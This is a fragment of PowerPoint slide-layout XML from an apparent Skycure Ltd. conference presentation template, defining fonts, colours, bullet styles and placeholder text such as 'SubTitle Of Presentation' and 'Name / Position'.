              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/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Lato Light"/>
                <a:cs typeface="Lato Ligh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buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="2000" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>First level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Second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447358"/>
            <a:ext cx="8229600" cy="970280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3200" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="3BA2CC"/>
                </a:solidFill>
                <a:latin typeface="Lato Regular"/>
                <a:cs typeface="Lato Regular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54666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6096000"/>
            <a:ext cx="9144000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3BA2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" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2120952" y="2723775"/>
            <a:ext cx="492749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solidFill>
                  <a:srgbClr val="3BA2CC"/>
                </a:solidFill>
                <a:latin typeface="Lato Regular"/>
                <a:cs typeface="Lato Regular"/>
              </a:rPr>
              <a:t>SubTitle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3BA2CC"/>
                </a:solidFill>
                <a:latin typeface="Lato Regular"/>
                <a:cs typeface="Lato Regular"/>
              </a:rPr>
              <a:t> Of Presentation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3BA2CC"/>
              </a:solidFill>
              <a:latin typeface="Lato Regular"/>
              <a:cs typeface="Lato Regular"/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457200" y="6268100"/>
            <a:ext cx="5442754" cy="325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1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FCFBF7"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:rPr>
              <a:t>© YYYY Skycure  Ltd.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FCFBF7"/>
              </a:solidFill>
              <a:latin typeface="Lato Light"/>
              <a:cs typeface="Lato Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37594285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56771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1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57200" y="2556490"/>
            <a:ext cx="8229600" cy="2179381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defRPr sz="4800" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="3BA2CC"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit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096000"/>
            <a:ext cx="9144000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3BA2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17850" y="1371902"/>
            <a:ext cx="2654300" cy="678364"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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6139221"/>
            <a:ext cx="4401574" cy="434258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="FCFBF7"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="2400" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="2000" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Name / Position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5243870" y="6139221"/>
            <a:ext cx="3442929" cy="434258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="FCFBF7"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="2400" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="2000" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Month / Year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967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2 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14176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457200" y="1940878"/>
            <a:ext cx="3697288" cy="38496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" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4337368" y="1940878"/>
            <a:ext cx="4349432" cy="3849687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/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Lato Light"/>
                <a:cs typeface="Lato Ligh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buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="2000" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>First level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Second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447358"/>
            <a:ext cx="8229600" cy="970280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3200" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="3BA2CC"/>
                </a:solidFill>
                <a:latin typeface="Lato Regular"/>
                <a:cs typeface="Lato Regular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1127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6096000"/>
            <a:ext cx="9144000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3BA2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 userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2120952" y="2723775"/>
            <a:ext cx="492749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0" i="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3BA2CC"/>
                </a:solidFill>
                <a:latin typeface="Lato Regular"/>
                <a:cs typeface="Lato Regular"/>
              </a:rPr>
              <a:t>SubTitle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3BA2CC"/>
                </a:solidFill>
                <a:latin typeface="Lato Regular"/>
                <a:cs typeface="Lato Regular"/>
              </a:rPr>
              <a:t> Of Presentation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3BA2CC"/>
              </a:solidFill>
              <a:latin typeface="Lato Regular"/>
              <a:cs typeface="Lato Regular"/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457200" y="6268100"/>
            <a:ext cx="5442754" cy="325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1400" b="0" i="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FCFBF7"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:rPr>
              <a:t>© YYYY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FCFBF7"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:rPr>
              <a:t> Skycure  Ltd.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FCFBF7"/>
              </a:solidFill>
              <a:latin typeface="Lato Light"/>
              <a:cs typeface="Lato Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5140832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5611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44760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me artwork large for section divider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8965" b="11509"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2127250" y="-668352"/>
            <a:ext cx="7040880" cy="7546848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350534" y="3268134"/>
            <a:ext cx="5068133" cy="3155247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l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
              <a:defRPr sz="2800" b="1" i="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="017E82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Sub-section Title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8568558" y="4336409"/>
            <a:ext cx="457496" cy="15388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1000" spc="-100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="466368"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>#RSAC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" spc="-100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="466368"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 24" descr="twitter bir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6073" y="4321826"/>
            <a:ext cx="195273" cy="20956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4964" y="598171"/>
            <a:ext cx="3265339" cy="772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534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57200" y="3289905"/>
            <a:ext cx="8229600" cy="895047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defRPr sz="4800" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="3BA2CC"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit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6096000"/>
            <a:ext cx="9144000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3BA2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6139221"/>
            <a:ext cx="4401574" cy="434258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="FCFBF7"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="2400" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="2000" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Name / Position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5243870" y="6139221"/>
            <a:ext cx="3442929" cy="434258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="FCFBF7"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="2400" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="2000" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Month / Year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096000"/>
            <a:ext cx="9144000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3BA2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17850" y="1371902"/>
            <a:ext cx="2654300" cy="678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967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4176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7358"/>
            <a:ext cx="8229600" cy="970280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3600" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="3BA2CC"/>
                </a:solidFill>
                <a:latin typeface="Lato Regular"/>
                <a:cs typeface="Lato Regular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3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/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Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Ligh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14176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04979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14176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457200" y="1940878"/>
            <a:ext cx="3697288" cy="38496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" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4337368" y="1940878"/>
            <a:ext cx="4349432" cy="3849687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/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Lato Light"/>
                <a:cs typeface="Lato Ligh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buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="2000" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:buClr>
                <a:srgbClr val="3BA2CC"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>First level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Second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447358"/>
            <a:ext cx="8229600" cy="970280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3200" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="3BA2CC"/>
                </a:solidFill>
                <a:latin typeface="Lato Regular"/>
                <a:cs typeface="Lato Regular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14176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1127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1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57200" y="2556490"/>
            <a:ext cx="8229600" cy="2179381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defRPr sz="4800" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="3BA2CC"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit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6096000"/>
            <a:ext cx="9144000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3BA2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17850" y="1371902"/>
            <a:ext cx="2654300" cy="678364"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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6139221"/>
            <a:ext cx="4401574" cy="434258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="FCFBF7"/>
                </a:solidFill>
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="2400" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="2000" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Lato Bold"/>
                <a:cs typeface="Lato Bold"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Name / Position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5243870" y="6139221"/>
            <a:ext cx="3442929" cy="434258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buNone/>
